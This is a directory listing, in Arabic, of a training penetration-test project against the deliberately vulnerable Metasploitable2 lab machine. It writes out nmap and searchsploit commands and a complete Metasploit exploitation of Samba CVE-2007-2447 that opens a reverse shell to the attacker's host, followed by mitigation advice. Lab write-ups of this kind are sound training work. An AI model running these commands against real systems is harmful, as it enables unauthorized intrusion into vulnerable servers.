Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Penetration-Testing-on-Metasploitable2 — مشروع اختبار اختراق عملي باستخدام Kali Linux ضد Metasploitable2. يتضمن سير العمل الكامل: فحص Nmap، التعداد، استغلال Metasploit (Samba CVE-2007-2447)، التحقق بعد الاستغلال، وخطوات التخفيف. يحتوي المستودع على الأوامر والمخرجات وتقرير يوضح كل من التقنيات الهجومية والتوصيات الدفاعية. | Kitploit
أدوات/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
الاستطلاعماسحات الثغرات الأمنيةتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

مشروع اختبار اختراق عملي باستخدام Kali Linux ضد Metasploitable2. يتضمن سير العمل الكامل: فحص Nmap، التعداد، استغلال Metasploit (Samba CVE-2007-2447)، التحقق بعد الاستغلال، وخطوات التخفيف. يحتوي المستودع على الأوامر والمخرجات وتقرير يوضح كل من التقنيات الهجومية والتوصيات الدفاعية.

عرض المستودعالموقع الإلكتروني
14منذ 0 سنواتلم تتم المراجعة بعد

مشروع التدريب 2 — اختبار الاختراق على Metasploitable2

  • الملخص: يُظهر هذا المشروع سير عمل كامل لاختبار الاختراق: الاستطلاع، التعداد، الاستغلال، التحقق بعد الاستغلال، وتوصيات التخفيف. الهدف المستخدم هو Metasploitable2 وصندوق الهجوم هو Kali Linux.

  • الأدوات: Kali Linux (المهاجم) Nmap (الاستطلاع) Metasploit Framework (الاستغلال) SearchSploit / Exploit-DB (الفرز)

الخطوات المنفذة:

  1. المسح: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x الخدمات المحددة (أمثلة): vsftpd 2.3.4 (منفذ 21 بانر)، Samba smbd 3.x (منفذ 445).
  2. التعداد والفرز: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 تم مطابقة الخدمات مع الثغرات المحتملة (باب خلفي لـ vsftpd، خريطة اسم المستخدم لـ Samba).
  3. الاستغلال
  • تمت محاولة الباب الخلفي لـ vsftpd (CVE-2011-2523) — بانر Nmap موجود لكن الخدمة غير مستجيبة; لم يُنشئ الثغرة جلسة.
  • تم استغلال Samba (CVE-2007-2447) بنجاح: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit تم الحصول على شل تفاعلي والتحقق من سياق المستخدم.
  1. ما بعد الاستغلال
  • تم التحقق من معلومات النظام: id uname -a
  • تم جمع الأدلة ولقطات الشاشة.
  1. توصيات التخفيف
  • المسح المنتظم وجرد الأصول.
  • التصحيح الفوري وترقيات الإصدار (تحديث Samba).
  • تقييد الوصول إلى المنافذ الحرجة (قواعد الجدار الناري).
  • تعطيل الخدمات غير المستخدمة والوصول المجهول.
  • تطبيق أقل امتياز على المشاركات والحسابات.
  • تقسيم الشبكة وتسجيل/مراقبة.
  • تخطيط الاستجابة للحوادث.

النتيجة تم بنجاح الحصول على شل عن بعد عبر ثغرة Samba، وتوثيق مسار الهجوم، وإنتاج خطة تخفيف. السجلات الكاملة ومخرجات الأوامر مخزنة في مجلد scans/.

تنزيل الأداة